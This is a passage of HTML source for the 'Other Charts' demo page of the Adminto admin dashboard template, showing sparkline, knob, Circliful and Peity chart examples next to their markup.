<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="A fully featured admin theme which can be used to build CRM, CMS, etc.">
        <meta name="author" content="Coderthemes">

        <link rel="shortcut icon" href="assets/images/favicon.ico">

        <title>Adminto - Responsive Admin Dashboard Template</title>

        <!-- Circlifull chart css -->
        <link href="assets/plugins/jquery-circliful/css/jquery.circliful.css" rel="stylesheet" type="text/css"/>

        <link href="assets/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/core.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/components.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/icons.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/pages.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/menu.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/responsive.css" rel="stylesheet" type="text/css" />

        <!-- HTML5 Shiv and Respond.js IE8 support of HTML5 elements and media queries -->
        <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
        <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
        <![endif]-->

        <script src="assets/js/modernizr.min.js"></script>

<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
                    (i[r].q = i[r].q || []).push(arguments)
                }, i[r].l = 1 * new Date();
        a = s.createElement(o),
                m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
    ga('create', 'UA-74137680-1', 'auto');
    ga('send', 'pageview');
</script>


    </head>


    <body>

        <!-- Navigation Bar-->
        <header id="topnav">
            <div class="topbar-main">
                <div class="container">

                    <!-- LOGO -->
                    <div class="topbar-left">
                        <a href="index.html" class="logo"><span>Admin<span>to</span></span></a>
                    </div>
                    <!-- End Logo container-->


                    <div class="menu-extras">

                        <ul class="nav navbar-nav navbar-right pull-right">
                            <li>
                                <form role="search" class="navbar-left app-search pull-left hidden-xs">
                                     <input type="text" placeholder="Search..." class="form-control">
                                     <a href=""><i class="fa fa-search"></i></a>
                                </form>
                            </li>
                            <li>
                                <!-- Notification -->
                                <div class="notification-box">
                                    <ul class="list-inline m-b-0">
                                        <li>
                                            <a href="javascript:void(0);" class="right-bar-toggle">
                                                <i class="zmdi zmdi-notifications-none"></i>
                                            </a>
                                            <div class="noti-dot">
                                                <span class="dot"></span>
                                                <span class="pulse"></span>
                                            </div>
                                        </li>
                                    </ul>
                                </div>
                                <!-- End Notification bar -->
                            </li>

                            <li class="dropdown user-box">
                                <a href="" class="dropdown-toggle waves-effect waves-light profile " data-toggle="dropdown" aria-expanded="true">
                                    <img src="assets/images/users/avatar-1.jpg" alt="user-img" class="img-circle user-img">
                                    <div class="user-status away"><i class="zmdi zmdi-dot-circle"></i></div>
                                </a>

                                <ul class="dropdown-menu">
                                    <li><a href="javascript:void(0)"><i class="ti-user m-r-5"></i> Profile</a></li>
                                    <li><a href="javascript:void(0)"><i class="ti-settings m-r-5"></i> Settings</a></li>
                                    <li><a href="javascript:void(0)"><i class="ti-lock m-r-5"></i> Lock screen</a></li>
                                    <li><a href="javascript:void(0)"><i class="ti-power-off m-r-5"></i> Logout</a></li>
                                </ul>
                            </li>
                        </ul>
                        <div class="menu-item">
                            <!-- Mobile menu toggle-->
                            <a class="navbar-toggle">
                                <div class="lines">
                                    <span></span>
                                    <span></span>
                                    <span></span>
                                </div>
                            </a>
                            <!-- End mobile menu toggle-->
                        </div>
                    </div>

                </div>
            </div>

            <div class="navbar-custom">
                <div class="container">
                    <div id="navigation">
                        <!-- Navigation Menu-->
                        <ul class="navigation-menu">
                            <li>
                                <a href="index.html"><i class="zmdi zmdi-view-dashboard"></i> <span> Dashboard </span> </a>
                            </li>
                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-invert-colors"></i> <span> User Interface </span> </a>
                                <ul class="submenu megamenu">
                                    <li>
                                        <ul>
                                            <li><a href="ui-buttons.html">Buttons</a></li>
                                            <li><a href="ui-cards.html">Cards</a></li>
                                            <li><a href="ui-typography.html">Typography </a></li>
                                            <li><a href="ui-checkbox-radio.html">Checkboxs-Radios</a></li>
                                            <li><a href="ui-material-icons.html">Material Design Icons</a></li>
                                            <li><a href="ui-font-awesome-icons.html">Font Awesome</a></li>
                                            <li><a href="ui-themify-icons.html">Themify Icons</a></li>
                                        </ul>
                                    </li>
                                    <li>
                                        <ul>
                                            <li><a href="ui-modals.html">Modals</a></li>
                                            <li><a href="ui-notification.html">Notification</a></li>
                                            <li><a href="ui-range-slider.html">Range Slider</a></li>
                                            <li><a href="ui-components.html">Components</a>
                                            <li><a href="ui-sweetalert.html">Sweet Alert</a>
                                            <li><a href="ui-treeview.html">Tree view</a>
                                            <li><a href="ui-widgets.html">Widgets</a></li>
                                        </ul>
                                    </li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-collection-text"></i><span> Forms </span> </a>
                                <ul class="submenu">
                                    <li><a href="form-elements.html">General Elements</a></li>
                                    <li><a href="form-advanced.html">Advanced Form</a></li>
                                    <li><a href="form-validation.html">Form Validation</a></li>
                                    <li><a href="form-wizard.html">Form Wizard</a></li>
                                    <li><a href="form-fileupload.html">Form Uploads</a></li>
                                    <li><a href="form-wysiwig.html">Wysiwig Editors</a></li>
                                    <li><a href="form-xeditable.html">X-editable</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-view-list"></i> <span> Tables </span> </a>
                                <ul class="submenu">
                                    <li><a href="tables-basic.html">Basic Tables</a></li>
                                    <li><a href="tables-datatable.html">Data Table</a></li>
                                    <li><a href="tables-editable.html">Editable Table</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu active">
                                <a href="#"><i class="zmdi zmdi-chart"></i><span> Charts </span> </a>
                                <ul class="submenu">
                                    <li><a href="chart-flot.html">Flot Chart</a></li>
                                    <li><a href="chart-morris.html">Morris Chart</a></li>
                                    <li><a href="chart-chartist.html">Chartist Charts</a></li>
                                    <li class="active"><a href="chart-other.html">Other Chart</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-collection-item"></i><span> Pages </span> </a>
                                <ul class="submenu">
                                    <li><a href="page-starter.html">Starter Page</a></li>
                                    <li><a href="page-login.html">Login</a></li>
                                    <li><a href="page-register.html">Register</a></li>
                                    <li><a href="page-recoverpw.html">Recover Password</a></li>
                                    <li><a href="page-lock-screen.html">Lock Screen</a></li>
                                    <li><a href="page-confirm-mail.html">Confirm Mail</a></li>
                                    <li><a href="page-404.html">Error 404</a></li>
                                    <li><a href="page-500.html">Error 500</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-layers"></i><span>Extra Pages </span> </a>
                                <ul class="submenu megamenu">
                                    <li>
                                        <ul>
                                            <li><a href="extras-projects.html">Projects</a></li>
                                            <li><a href="extras-tour.html">Tour</a></li>
                                            <li><a href="extras-taskboard.html">Taskboard</a></li>
                                            <li><a href="extras-inbox.html">Mail</a></li>
                                            <li><a href="extras-taskdetail.html">Task Detail</a></li>
                                            <li><a href="extras-maps.html">Maps</a></li>
                                            <li><a href="extras-calendar.html" >Calendar</a></li>
                                            <li><a href="extras-contact.html">Contact list</a></li>
                                            <li><a href="extras-pricing.html">Pricing</a></li>
                                        </ul>
                                    </li>
                                    <li>
                                        <ul>
                                            <li><a href="extras-timeline.html">Timeline</a></li>
                                            <li><a href="extras-invoice.html">Invoice</a></li>
                                            <li><a href="extras-profile.html">Profile</a></li>
                                            <li><a href="extras-faq.html">FAQ</a></li>
                                            <li><a href="extras-gallery.html">Gallery</a></li>
                                            <li><a href="extras-email-template.html">Email template</a></li>
                                            <li><a href="extras-maintenance.html">Maintenance</a></li>
                                            <li><a href="extras-comingsoon.html">Coming soon</a></li>
                                        </ul>
                                    </li>
                                </ul>
                            </li>

                        </ul>
                        <!-- End navigation menu  -->
                    </div>
                </div>
            </div>
        </header>
        <!-- End Navigation Bar-->


        <div class="wrapper">
            <div class="container">

                <!-- Page-Title -->
                <div class="row">
                    <div class="col-sm-12">
                        <div class="btn-group pull-right m-t-15">
                            <button type="button" class="btn btn-custom dropdown-toggle waves-effect waves-light" data-toggle="dropdown" aria-expanded="false">Settings <span class="m-l-5"><i class="fa fa-cog"></i></span></button>
                            <ul class="dropdown-menu" role="menu">
                                <li><a href="#">Action</a></li>
                                <li><a href="#">Another action</a></li>
                                <li><a href="#">Something else here</a></li>
                                <li class="divider"></li>
                                <li><a href="#">Separated link</a></li>
                            </ul>
                        </div>
                        <h4 class="page-title">Other Charts</h4>
                    </div>
                </div>


                <div class="row">
                    <div class="col-md-4">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Line Charts</h4>

                            <div id="sparkline1"></div>
                        </div>
                    </div><!-- end col-->

                    <div class="col-md-4">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Bar Chart</h4>

                            <div id="sparkline2" class="text-center"></div>
                        </div>
                    </div><!-- end col-->

                    <div class="col-md-4">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Pie Chart</h4>

                            <div id="sparkline3" class="text-center"></div>
                        </div>
                    </div><!-- end col-->
                </div>
                <!-- end Row -->


                <div class="row">
                    <div class="col-md-4">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Custom Line Chart</h4>

                            <div id="sparkline4" class="text-center"></div>
                        </div>
                    </div><!-- end col-->

                    <div class="col-md-4">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Mouse Speed Chart Example</h4>

                            <div id="sparkline5" class="text-center"></div>
                        </div>
                    </div><!-- end col-->

                    <div class="col-md-4">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Composite bar Chart</h4>

                            <div id="sparkline6" class="text-center"></div>
                        </div>
                    </div><!-- end col-->
                </div>
                <!-- end Row -->


                <div class="row">
                    <div class="col-sm-12">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Jquery Knob</h4>

                            <div class="row">
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="m-b-25">
                                        <input data-plugin="knob" data-width="150" data-height="150"
                                               data-fgColor="#71b6f9" data-displayInput=false value="35"/>
                                        <h5 class="font-600 text-muted">Disable display input</h5>
                                    </div>
                                </div><!-- end col-->
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="m-b-25">
                                        <input data-plugin="knob" data-width="150" data-height="150" data-cursor=true
                                               data-fgColor="#10c469" value="29"/>
                                        <h5 class="font-600 text-muted">Cursor mode</h5>
                                    </div>
                                </div><!-- end col-->
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="m-b-25">
                                        <input data-plugin="knob" data-width="150" data-height="150" data-min="-100"
                                               data-fgColor="#f9c851" data-displayPrevious=true value="44"/>
                                        <h5 class="font-600 text-muted">Display previous value</h5>
                                    </div>
                                </div><!-- end col-->
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="m-b-25">
                                        <input data-plugin="knob" data-width="150" data-height="150" data-min="-100"
                                               data-fgColor="#35b8e0" data-displayPrevious=true data-angleOffset=-125
                                               data-angleArc=250 value="44"/>
                                        <h5 class="font-600 text-muted">Angle offset and arc</h5>
                                    </div>
                                </div><!-- end col-->
                            </div><!-- end row -->

                            <div class="row">
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="p-20">
                                        <input data-plugin="knob" data-width="150" data-height="150"
                                               data-angleOffset="90" data-linecap="round" data-fgColor="#ff8acc"
                                               value="35"/>
                                        <h5 class="font-600 text-muted">Angle offset</h5>
                                    </div>
                                </div><!-- end col-->
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="p-20">
                                        <input data-plugin="knob" data-width="150" data-height="150" data-min="-15000"
                                               data-displayPrevious=true data-max="15000" data-step="1000"
                                               value="-11000" data-fgColor="#5b69bc"/>
                                        <h5 class="font-600 text-muted">5-digit values, step 1000</h5>
                                    </div>
                                </div><!-- end col-->
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="p-20">
                                        <input data-plugin="knob" data-width="150" data-height="150" data-linecap=round
                                               data-fgColor="#435966" value="80" data-skin="tron" data-angleOffset="180"
                                               data-readOnly=true data-thickness=".1"/>
                                        <h5 class="font-600 text-muted">Readonly</h5>
                                    </div>
                                </div><!-- end col-->
                                <div class="col-sm-6 col-lg-3 text-center">
                                    <div class="p-20">
                                        <input data-plugin="knob" data-width="150" data-height="150"
                                               data-displayPrevious=true data-fgColor="#ff5b5b" data-skin="tron"
                                               data-cursor=true value="75" data-thickness=".2" data-angleOffset=-125
                                               data-angleArc=250 value="44"/>
                                        <h5 class="font-600 text-muted">Angle offset and arc</h5>
                                    </div>
                                </div><!-- end col-->
                            </div><!-- end row-->

                        </div>
                    </div><!-- end col-->
                </div>
                <!-- End row -->


                <div class="row">

                    <div class="col-md-12">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Circliful Charts</h4>

                            <div class="row text-center">
                                <div class="col-sm-6 col-lg-3">
                                    <div data-plugin="circliful" class="circliful-chart m-b-30" data-dimension="180"
                                         data-text="35%" data-info="New Clients" data-width="20" data-fontsize="24"
                                         data-percent="35" data-fgcolor="#10c469" data-bgcolor="#ebeff2"
                                         data-fill="#f4f8fb"></div>
                                </div>

                                <div class="col-sm-6 col-lg-3">
                                    <div data-plugin="circliful" class="circliful-chart m-b-30" data-dimension="180"
                                         data-text="35%" data-info="New Clients" data-width="30" data-fontsize="24"
                                         data-percent="35" data-fgcolor="#71b6f9" data-bgcolor="#ebeff2"></div>
                                </div>

                                <div class="col-sm-6 col-lg-3">
                                    <div data-plugin="circliful" class="circliful-chart m-b-30" data-startdegree="90"
                                         data-dimension="180" data-text="35%" data-info="New Clients" data-width="30"
                                         data-fontsize="24" data-percent="35" data-fgcolor="#f9c851"
                                         data-bgcolor="#ebeff2"></div>
                                </div>

                                <div class="col-sm-6 col-lg-3">
                                    <div data-plugin="circliful" class="circliful-chart m-b-30" data-startdegree="180"
                                         data-dimension="180" data-text="35%" data-info="New Clients" data-width="30"
                                         data-fontsize="24" data-percent="35" data-fgcolor="#5b69bc"
                                         data-bgcolor="#ebeff2"></div>
                                </div>

                            </div><!-- end row -->


                            <div class="row text-center">
                                <div class="col-sm-6 col-lg-3">
                                    <div data-plugin="circliful" class="circliful-chart" data-dimension="200"
                                         data-text="35%" data-info="New Clients" data-width="30" data-fontsize="24"
                                         data-percent="35" data-fgcolor="#35b8e0" data-bgcolor="#ebeff2"
                                         data-type="half" data-fill="#f4f8fb"></div>
                                </div>

                                <div class="col-sm-6 col-lg-3">
                                    <div data-plugin="circliful" class="circliful-chart" data-dimension="200"
                                         data-text="" data-info="New Clients" data-width="30" data-fontsize="24"
                                         data-percent="35" data-fgcolor="#ff8acc" data-bgcolor="#ebeff2"
                                         data-type="half" data-icon="fa-bed"></div>
                                </div>

                                <div class="col-sm-6 col-lg-3">
                                    <div data-plugin="circliful" class="circliful-chart" data-startdegree="45"
                                         data-dimension="200" data-text="50%" data-info="New Clients" data-width="30"
                                         data-fontsize="24" data-percent="50" data-fgcolor="#ff5b5b"
                                         data-bgcolor="#ebeff2" data-type="half" data-fill="#f4f8fb"></div>
                                </div>

                            </div><!-- end col-->
                        </div>
                    </div><!-- end col-->

                </div> <!-- End row -->


                <div class="row">
                    <div class="col-lg-6">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Pie Charts</h4>

                            <table class="table">
                                <thead>
                                    <tr>
                                        <th>Graph</th>
                                        <th>Code</th>
                                    </tr>
                                </thead>

                                <tbody>
                                    <tr>
                                        <td>
                                            <span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2" data-width="30"
                                                  data-height="30">1/5</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;1/5&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2" data-width="30"
                                                  data-height="30">226/360</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;226/360&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="pie" data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">0.52/1.561</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;0.52/1.561&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="pie" data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">1,4</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;1,4&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="pie" data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">226,134</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;226,134&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="pie" data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">0.52,1.041</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-pie" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;0.52,1.041&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                    </div><!-- end col-->


                    <div class="col-lg-6">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Donut Charts</h4>

                            <table class="table">
                                <thead>
                                    <tr>
                                        <th>Graph</th>
                                        <th>Code</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    <tr>
                                        <td>
                                            <span class="donut" data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">1/5</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;1/5&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="donut" data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">226/360</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;226/360&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="donut" data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">0.52/1.561</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;0.52/1.561&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="donut" data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">1,4</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;1/4&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="donut" data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">226,134</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;226,134&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <span class="donut" data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                  data-width="30" data-height="30">1,2,3,2,2</span>
                                        </td>
                                        <td>
                                            <code>&lt;span data-plugin="peity-donut" data-colors="#71b6f9,#ebeff2"
                                                data-width="30" data-height="30"&gt;1,2,3,2,2&lt;/span&gt;</code>
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                    </div><!-- end col-->
                </div>
                <!-- end row -->


                <div class="row">
                    <div class="col-lg-6">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Line and Bars Charts</h4>

                            <table class="table">
                                <thead>
                                    <tr>
                                        <th>Graph</th>
                                        <th>Code</th>
                                    </tr>
                                </thead>
                                <tbody>

                                <tr>
                                    <td>
                                        <span data-plugin="peity-line" data-fill="#71b6f9" data-stroke="#169c81"
                                              data-width="120" data-height="40">5,3,9,6,5,9,7,3,5,2</span>
                                    </td>
                                    <td>
                                        <code>&lt;span data-plugin="peity-line" data-fill="#71b6f9"
                                            data-stroke="#169c81" data-width="100" data-height="40"&gt;5,3,9,6,5,9,7,3,5,2&lt;/span&gt;</code>
                                    </td>
                                </tr>
                                <tr>
                                    <td>
                                        <span data-plugin="peity-line" data-fill="#71b6f9" data-stroke="#169c81"
                                              data-width="120" data-height="40">5,3,2,-1,-3,-2,2,3,5,2</span>
                                    </td>
                                    <td>
                                        <code>&lt;span data-plugin="peity-line" data-fill="#71b6f9"
                                            data-stroke="#169c81" data-width="100" data-height="100"&gt;5,3,2,-1,-3,-2,2,3,5,2&lt;/span&gt;</code>
                                    </td>
                                </tr>
                                <tr>
                                    <td>
                                        <span data-plugin="peity-line" data-fill="#71b6f9" data-stroke="#169c81"
                                              data-width="120" data-height="40">0,-3,-6,-4,-5,-4,-7,-3,-5,-2</span>
                                    </td>
                                    <td>
                                        <code>&lt;span data-plugin="peity-line" data-fill="#71b6f9"
                                            data-stroke="#169c81" data-width="100" data-height="100"&gt;0,-3,-6,-4,-5,-4,-7,-3,-5,-2&lt;/span&gt;</code>
                                    </td>
                                </tr>
                                <tr>
                                    <td>
                                        <span data-plugin="peity-bar" data-colors="#71b6f9,#ebeff2" data-width="100"
                                              data-height="30">5,3,9,6,5,9,7,3,5,2</span>
                                    </td>
                                    <td>
                                        <code>&lt;span data-plugin="peity-bar" data-colors="#71b6f9,#ebeff2"
                                            data-width="100" data-height="30"&gt;5,3,9,6,5,9,7,3,5,2&lt;/span&gt;</code>
                                    </td>
                                </tr>
                                <tr>
                                    <td>
                                        <span data-plugin="peity-bar" data-colors="#71b6f9,#ebeff2" data-width="100"
                                              data-height="30">5,3,2,-1,-3,-2,2,3,5,2</span>
                                    </td>
                                    <td>
                                        <code>&lt;span data-plugin="peity-bar" data-colors="#71b6f9,#ebeff2"
                                            data-width="100"
                                            data-height="30"&gt;5,3,2,-1,-3,-2,2,3,5,2&lt;/span&gt;</code>
                                    </td>
                                </tr>
                                </tbody>
                            </table>
                        </div>
                    </div><!-- end col-->


                    <div class="col-lg-6">
                        <div class="card-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30">Data-attributes charts</h4>

                            <table class="table">
                                <thead>
                                <tr>
                                    <th>Graph</th>
                                    <th>Code</th>
                                </tr>
                                </thead>

                                <tbody>
                                <tr>
                                    <td>
                                        <span data-plugin="peity-donut-alt"
                                              data-peity='{ "fill": ["#4c5667", "#ebeff2"], "innerRadius": 24, "radius": 30 }'>6/7</span>
                                    </td>
                                    <td>
                                        <code>
                                            &lt;span data-plugin="peity-donut-alt" data-peity='{ "fill": ["#4c5667",
                                            "#ebeff2"], "innerRadius": 24, "radius": 30 }'"&gt;6/7&lt;/span&gt;
                                        </code>
                                    </td>
                                </tr>
                                <tr>
                                    <td>
                                        <span data-plugin="peity-donut-alt"
                                              data-peity='{ "fill": ["#71b6f9", "#ebeff2"],  "innerRadius": 18, "radius": 28 }'>4/7</span>
                                    </td>
                                    <td>
                                        <code>
                                            &lt;span data-plugin="peity-donut-alt" data-peity='{ "fill": ["#71b6f9`",
